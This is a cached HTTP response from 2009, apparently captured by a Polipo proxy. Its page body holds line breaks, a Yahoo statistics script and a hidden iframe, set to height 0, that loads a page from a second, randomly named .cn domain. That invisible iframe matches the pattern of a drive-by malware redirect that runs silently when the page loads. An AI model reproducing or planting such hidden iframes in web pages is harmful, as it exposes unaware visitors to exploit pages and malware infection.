HTTP/1.1 200 OK
Content-Length: 332
ETag: "46232ad8a096c91:440"
Date: Thu, 26 Feb 2009 06:12:22 GMT
Last-Modified: Tue, 24 Feb 2009 16:56:32 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Polipo-Location: http://w.mi2123.cn/gg/15.htm
X-Polipo-Date: Thu, 26 Feb 2009 06:22:44 GMT
X-Polipo-Access: Thu, 26 Feb 2009 06:32:41 GMT

 <br>
<br>
<br>
<iframe src=http://z.fghf9.cn/d3/fxx.htm width=100 height=0></Iframe>
<br>
<br>
<br>
<br>

<script type="text/javascript" src="http://js.tongji.cn.yahoo.com/935178/ystat.js"></script><noscript><a href="http://tongji.cn.yahoo.com"><img src="http://img.tongji.cn.yahoo.com/935178/ystat.gif"/></a></noscript>
